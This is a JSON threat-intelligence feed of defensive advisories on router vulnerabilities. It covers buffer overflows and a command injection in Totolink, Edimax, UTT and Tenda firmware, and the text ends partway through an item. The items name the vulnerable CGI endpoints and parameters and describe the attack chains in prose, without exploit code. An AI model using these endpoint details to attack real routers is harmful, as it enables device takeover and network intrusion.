{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/router/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7749"}],"_cs_exploited":false,"_cs_products":["N300RH 3.2.4-B20220812"],"_cs_severities":["high"],"_cs_tags":["buffer-overflow","router","cve-2026-7749"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in Totolink N300RH router version 3.2.4-B20220812. The vulnerability resides in the \u003ccode\u003esetWanConfig\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, which handles POST requests. An attacker can exploit this vulnerability by manipulating the \u003ccode\u003epriDns\u003c/code\u003e argument in a crafted POST request. The vulnerability allows for remote exploitation, meaning an attacker does not need local access to the device. Public exploits for this vulnerability are already available, increasing the risk of exploitation. This vulnerability was published on 2026-05-04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink N300RH router running firmware version 3.2.4-B20220812.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003epriDns\u003c/code\u003e argument with a value exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetWanConfig\u003c/code\u003e function processes the \u003ccode\u003epriDns\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003epriDns\u003c/code\u003e value overwrites adjacent memory on the stack, potentially including control flow data.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow by overwriting the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining a shell.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the compromised router to perform lateral movement, exfiltrate data, or establish a persistent backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability can lead to complete compromise of the Totolink N300RH router. An attacker could gain unauthorized access to the device\u0026rsquo;s configuration, intercept network traffic, or use the router as a pivot point to attack other devices on the network. Given that public exploits are available, a wide range of attackers could potentially exploit this vulnerability. The CVSS v3.1 base score is 8.8 (HIGH).\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with abnormally long \u003ccode\u003epriDns\u003c/code\u003e values to detect potential exploitation attempts using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect and block malicious POST requests targeting \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eContact Totolink for a security patch or firmware update to address CVE-2026-7749.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T10:16:01Z","date_published":"2026-05-04T10:16:01Z","id":"/briefs/2026-05-totolink-n300rh-buffer-overflow/","summary":"A buffer overflow vulnerability exists in Totolink N300RH version 3.2.4-B20220812, specifically affecting the setWanConfig function within the /cgi-bin/cstecgi.cgi file, allowing a remote attacker to exploit it by manipulating the priDns argument in a POST request.","title":"Totolink N300RH Buffer Overflow Vulnerability in setWanConfig","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-n300rh-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7750"}],"_cs_exploited":false,"_cs_products":["N300RH 3.2.4-B20220812"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","router","cve","webserver"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability, identified as CVE-2026-7750, affects Totolink N300RH router version 3.2.4-B20220812. The vulnerability resides in the \u003ccode\u003esetMacFilterRules\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, which handles POST requests. Attackers can exploit this flaw by sending a specially crafted POST request with an overly long \u003ccode\u003emac_address\u003c/code\u003e parameter, triggering a buffer overflow. Successful exploitation allows for arbitrary code execution on the device. The vulnerability is remotely exploitable, and a public exploit is available, increasing the risk of widespread attacks. Defenders should prioritize patching or mitigating this vulnerability to prevent potential compromise of affected devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink N300RH router running firmware version 3.2.4-B20220812.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003emac_address\u003c/code\u003e parameter, injecting a string longer than the buffer allocated for it.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetMacFilterRules\u003c/code\u003e function processes the POST request without proper bounds checking on the \u003ccode\u003emac_address\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe overly long \u003ccode\u003emac_address\u003c/code\u003e value overflows the buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite the return address, redirecting execution flow to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe injected code executes with the privileges of the web server, allowing the attacker to execute arbitrary commands.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control over the router, potentially using it for further malicious activities such as network pivoting, data exfiltration, or denial-of-service attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7750 allows a remote attacker to execute arbitrary code on the vulnerable Totolink N300RH device. This could lead to a complete compromise of the router, allowing the attacker to control network traffic, steal sensitive information, or use the router as a bot in a larger attack. Given the public availability of the exploit, a large number of unpatched devices could be vulnerable to automated attacks, potentially impacting thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Totolink to address CVE-2026-7750.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect and block suspicious POST requests targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint with excessively long \u003ccode\u003emac_address\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e, focusing on requests with large \u003ccode\u003emac_address\u003c/code\u003e values.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T10:16:01Z","date_published":"2026-05-04T10:16:01Z","id":"/briefs/2026-05-totolink-buffer-overflow/","summary":"A buffer overflow vulnerability exists in Totolink N300RH 3.2.4-B20220812 allowing remote attackers to execute arbitrary code by manipulating the mac_address argument in the setMacFilterRules function of the /cgi-bin/cstecgi.cgi POST request handler.","title":"Totolink N300RH Buffer Overflow Vulnerability (CVE-2026-7750)","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7717"}],"_cs_exploited":false,"_cs_products":["WA300 5.2cu.7112_B20190227"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","remote-code-execution","router"],"_cs_type":"threat","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in Totolink WA300 wireless router, specifically version 5.2cu.7112_B20190227. The vulnerability resides within the \u003ccode\u003eUploadCustomModule\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, a component of the POST Request Handler. The identified vulnerability allows a remote attacker to cause a buffer overflow through manipulation of the \u003ccode\u003eFile\u003c/code\u003e argument within a crafted POST request. Public proof-of-concept exploit code is available, increasing the likelihood of exploitation. This vulnerability poses a significant risk, as successful exploitation could lead to arbitrary code execution, potentially allowing attackers to fully compromise affected devices. Defenders should prioritize detection and mitigation strategies to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Totolink WA300 device running firmware version 5.2cu.7112_B20190227.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a \u003ccode\u003eFile\u003c/code\u003e argument with a payload exceeding the buffer size allocated for the \u003ccode\u003eUploadCustomModule\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eUploadCustomModule\u003c/code\u003e function processes the POST request without proper bounds checking on the \u003ccode\u003eFile\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003eFile\u003c/code\u003e argument overwrites adjacent memory regions, including potentially critical program data and control flow instructions.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow allows the attacker to inject and execute arbitrary code on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access to the device with elevated privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the compromised device to pivot into the internal network or cause a denial-of-service condition.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability can lead to complete compromise of the affected Totolink WA300 device. An attacker could gain unauthorized access to the device\u0026rsquo;s configuration, intercept network traffic, or use the device as a bot in a larger attack. Given the high CVSS score of 8.8, the impact is considered critical. Home and small business networks using the affected router model are at risk. The vulnerability allows for remote code execution, leading to significant potential for damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink WA300 UploadCustomModule Buffer Overflow Attempt\u003c/code\u003e to detect malicious POST requests targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with unusually large \u003ccode\u003eFile\u003c/code\u003e parameters, as indicated in the Sigma rule.\u003c/li\u003e\n\u003cli\u003eApply any available firmware updates from Totolink to patch CVE-2026-7717 if they become available.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router on other internal network resources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T01:16:05Z","date_published":"2026-05-04T01:16:05Z","id":"/briefs/2026-05-totolink-wa300-buffer-overflow/","summary":"A remote buffer overflow vulnerability exists in the UploadCustomModule function of the /cgi-bin/cstecgi.cgi file in the POST Request Handler component of Totolink WA300 version 5.2cu.7112_B20190227, which can be exploited by manipulating the File argument.","title":"Totolink WA300 Buffer Overflow Vulnerability in UploadCustomModule","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-wa300-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7685"}],"_cs_exploited":false,"_cs_products":["BR-6208AC (\u003c= 1.02)"],"_cs_severities":["critical"],"_cs_tags":["buffer overflow","cve-2026-7685","router","webserver"],"_cs_type":"advisory","_cs_vendors":["Edimax"],"content_html":"\u003cp\u003eA buffer overflow vulnerability, CVE-2026-7685, has been identified in Edimax BR-6208AC routers up to version 1.02. The vulnerability resides within the \u003ccode\u003e/goform/setWAN\u003c/code\u003e file, specifically related to the \u003ccode\u003epptpDfGateway\u003c/code\u003e argument. Successful exploitation of this flaw could allow a remote attacker to execute arbitrary code or cause a denial-of-service condition. Publicly available exploits exist, increasing the risk of widespread exploitation. The vendor was notified but has not responded. Given the ease of exploitation and the potential for significant impact, this vulnerability poses a critical threat to affected devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an Edimax BR-6208AC router with firmware version 1.02 or earlier exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/setWAN\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003epptpDfGateway\u003c/code\u003e argument, injecting a payload exceeding the buffer\u0026rsquo;s expected size.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the malicious request without proper input validation on the size of the \u003ccode\u003epptpDfGateway\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized payload overwrites adjacent memory regions on the stack, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eWhen the function attempts to return, it jumps to an address controlled by the attacker, leading to arbitrary code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands to gain control of the device, potentially installing malware or modifying router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of the Edimax BR-6208AC router. An attacker could leverage this access to perform a variety of malicious activities, including eavesdropping on network traffic, injecting malicious code into web pages served by the router, or using the router as a bot in a larger botnet. Given the availability of public exploits, unpatched devices are at immediate risk of compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Edimax BR-6208AC setWAN Buffer Overflow Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eInspect web server logs for POST requests to \u003ccode\u003e/goform/setWAN\u003c/code\u003e containing unusually long \u003ccode\u003epptpDfGateway\u003c/code\u003e parameters, as detected by the Sigma rule \u003ccode\u003eDetect Long pptpDfGateway Parameter\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eApply appropriate network segmentation to limit the blast radius of compromised devices and prevent lateral movement.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-03T07:16:25Z","date_published":"2026-05-03T07:16:25Z","id":"/briefs/2026-05-edimax-bo/","summary":"A buffer overflow vulnerability exists in Edimax BR-6208AC devices (\u003c= 1.02) via manipulation of the pptpDfGateway argument in the /goform/setWAN endpoint, potentially allowing remote attackers to execute arbitrary code.","title":"Edimax BR-6208AC Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-edimax-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7546"}],"_cs_exploited":false,"_cs_products":["NR1800X 9.1.0u.6279_B20210910"],"_cs_severities":["critical"],"_cs_tags":["cve","remote code execution","buffer overflow","router"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical security vulnerability, CVE-2026-7546, affects Totolink NR1800X routers running firmware version 9.1.0u.6279_B20210910. The vulnerability resides within the \u003ccode\u003efind_host_ip\u003c/code\u003e function of the lighttpd web server component. By exploiting this flaw, a remote, unauthenticated attacker can trigger a stack-based buffer overflow through manipulation of the Host argument in an HTTP request. The publicly disclosed exploit allows attackers to potentially gain complete control of the device. This vulnerability poses a significant risk to home and small business networks utilizing the affected Totolink router model, as successful exploitation leads to arbitrary code execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink NR1800X router running firmware version 9.1.0u.6279_B20210910.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the router\u0026rsquo;s web interface.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003eHost\u003c/code\u003e header with a string exceeding the buffer size allocated in the \u003ccode\u003efind_host_ip\u003c/code\u003e function within the \u003ccode\u003elighttpd\u003c/code\u003e component.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003elighttpd\u003c/code\u003e server processes the HTTP request and passes the \u003ccode\u003eHost\u003c/code\u003e header value to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efind_host_ip\u003c/code\u003e function attempts to store the oversized \u003ccode\u003eHost\u003c/code\u003e value in a stack-allocated buffer.\u003c/li\u003e\n\u003cli\u003eA stack-based buffer overflow occurs due to the insufficient buffer size.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent memory on the stack, potentially including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7546 allows a remote attacker to execute arbitrary code on the vulnerable Totolink NR1800X device. This can lead to complete control of the router, allowing the attacker to modify router settings, intercept network traffic, or use the compromised router as a pivot point for further attacks within the network. Given the nature of stack-based buffer overflows, the attacker can potentially install persistent backdoors or malware. This presents a significant risk to users, potentially exposing sensitive data and infrastructure to unauthorized access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches released by Totolink to remediate CVE-2026-7546.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious HTTP requests targeting Totolink routers, specifically looking for abnormally long Host headers with the Sigma rule \u0026ldquo;Detect Suspiciously Long Host Header\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eReview and harden router configurations, including disabling remote administration if not required.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T03:16:01Z","date_published":"2026-05-01T03:16:01Z","id":"/briefs/2026-05-totolink-rce/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-7546) in the Totolink NR1800X router allows remote attackers to achieve arbitrary code execution by sending a crafted HTTP request with a manipulated Host header to the vulnerable lighttpd component.","title":"Totolink NR1800X Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7548"}],"_cs_exploited":false,"_cs_products":["NR1800X 9.1.0u.6279_B20210910"],"_cs_severities":["critical"],"_cs_tags":["command-injection","router","network"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-7548, affects Totolink NR1800X router version 9.1.0u.6279_B20210910. The vulnerability resides within the \u003ccode\u003esub_41A68C\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003esetUssd\u003c/code\u003e argument, a remote attacker can inject arbitrary commands into the system. Publicly available exploit code makes exploitation easier. This vulnerability poses a significant risk as it allows unauthenticated remote attackers to execute arbitrary commands on the affected device, potentially leading to full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink NR1800X device running firmware version 9.1.0u.6279_B20210910.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes the \u003ccode\u003esetUssd\u003c/code\u003e argument with a malicious payload designed to inject a command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esub_41A68C\u003c/code\u003e function processes the \u003ccode\u003esetUssd\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed by the system with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access and can execute arbitrary commands on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker may then use the command execution to escalate privileges, install malware, or pivot to other devices on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected Totolink NR1800X router. This could lead to complete compromise of the device, allowing the attacker to control network traffic, modify router settings, or use the router as a pivot point to attack other devices on the network. Given the wide usage of Totolink routers, a large number of devices could be vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing suspicious characters or command injection attempts in the \u003ccode\u003esetUssd\u003c/code\u003e parameter, using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply available patches provided by Totolink to address the CVE-2026-7548 vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T03:16:01Z","date_published":"2026-05-01T03:16:01Z","id":"/briefs/2026-05-totolink-command-injection/","summary":"A command injection vulnerability exists in Totolink NR1800X version 9.1.0u.6279_B20210910, affecting the function sub_41A68C of the file /cgi-bin/cstecgi.cgi; by manipulating the argument setUssd, a remote attacker can inject commands, and an exploit is publicly available.","title":"Totolink NR1800X Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7513"}],"_cs_exploited":false,"_cs_products":["HiPER 1200GW (\u003c= 2.5.3-170306)"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","iot","router","cve"],"_cs_type":"threat","_cs_vendors":["UTT"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in UTT HiPER 1200GW devices with firmware versions up to 2.5.3-170306. The flaw resides within the \u003ccode\u003estrcpy\u003c/code\u003e function of the \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e file, which handles remote control functionalities. A remote attacker can exploit this vulnerability by sending a specially crafted request to trigger the buffer overflow, potentially leading to arbitrary code execution on the affected device. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations using the affected UTT HiPER 1200GW devices, as it could allow attackers to gain unauthorized access and control over the device and potentially the network it is connected to.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable UTT HiPER 1200GW device exposed to the internet.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes a payload designed to overflow the buffer when processed by the \u003ccode\u003estrcpy\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003estrcpy\u003c/code\u003e function within \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e copies the attacker-controlled data without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory regions, potentially including critical program data or execution pointers.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the overflow to inject and execute arbitrary code on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the device, potentially escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised device to pivot to other systems on the network, exfiltrate sensitive data, or cause further damage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability could lead to complete compromise of the affected UTT HiPER 1200GW device. Attackers could gain unauthorized access to sensitive data, disrupt device functionality, or use the device as a foothold for further attacks within the network. Given that public exploits are available, the risk of widespread exploitation is high. While the exact number of affected devices is unknown, organizations using UTT HiPER 1200GW devices should take immediate action to mitigate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates from UTT to address the buffer overflow vulnerability in UTT HiPER 1200GW devices.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious requests targeting the \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e endpoint, and deploy the Sigma rule \u003ccode\u003eDetect Suspicious Requests to FormRemoteControl\u003c/code\u003e to identify potentially malicious activity.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures to prevent buffer overflows in web applications.\u003c/li\u003e\n\u003cli\u003eConsider network segmentation to limit the impact of a compromised device on other systems within the network.\u003c/li\u003e\n\u003cli\u003eReview and restrict access to the device\u0026rsquo;s web interface to only authorized personnel.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T00:16:25Z","date_published":"2026-05-01T00:16:25Z","id":"/briefs/2026-05-utt-hiper-buffer-overflow/","summary":"A buffer overflow vulnerability exists in UTT HiPER 1200GW devices up to version 2.5.3-170306, stemming from manipulation of the `strcpy` function in the `/goform/formRemoteControl` file, which allows remote attackers to execute arbitrary code.","title":"UTT HiPER 1200GW Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-utt-hiper-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7470"}],"_cs_exploited":false,"_cs_products":["4G300"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","tenda","router","cve-2026-7470"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda 4G300 routers, specifically version US_4G300V1.0Mt_V1.01.42_CN_TDC01. The vulnerability resides within the \u003ccode\u003esub_427C3C\u003c/code\u003e function located in the \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e file. An attacker can exploit this flaw by manipulating the \u003ccode\u003epage\u003c/code\u003e argument in a crafted request, leading to a buffer overflow and potentially allowing for arbitrary code execution on the affected device. The vulnerability, identified as CVE-2026-7470, poses a significant risk as remote exploitation is possible, and a proof-of-concept exploit is publicly available, increasing the likelihood of malicious actors leveraging this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda 4G300 router running the vulnerable firmware version US_4G300V1.0Mt_V1.01.42_CN_TDC01.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003epage\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it within the \u003ccode\u003esub_427C3C\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router processes the HTTP request, passing the oversized \u003ccode\u003epage\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esub_427C3C\u003c/code\u003e function attempts to write the oversized data into a stack-based buffer, causing a buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker redirects execution flow to a malicious code payload injected into the request or elsewhere in memory.\u003c/li\u003e\n\u003cli\u003eThe injected code executes with the privileges of the router process, potentially allowing the attacker to gain full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of the Tenda 4G300 router. An attacker could gain unauthorized access to the device\u0026rsquo;s configuration, intercept network traffic, or use the router as a launching point for further attacks against other devices on the network or the internet. Given the widespread use of these routers in homes and small businesses, a successful attack could impact a large number of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for unusual POST requests to \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e with abnormally long \u003ccode\u003epage\u003c/code\u003e parameters. Use the provided Sigma rule to detect suspicious activity.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e endpoint to mitigate potential brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply any available patches or firmware updates released by Tenda to address CVE-2026-7470.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T03:16:01Z","date_published":"2026-04-30T03:16:01Z","id":"/briefs/2026-04-tenda-stack-overflow/","summary":"A remote stack-based buffer overflow vulnerability exists in the Tenda 4G300 router, version US_4G300V1.0Mt_V1.01.42_CN_TDC01, 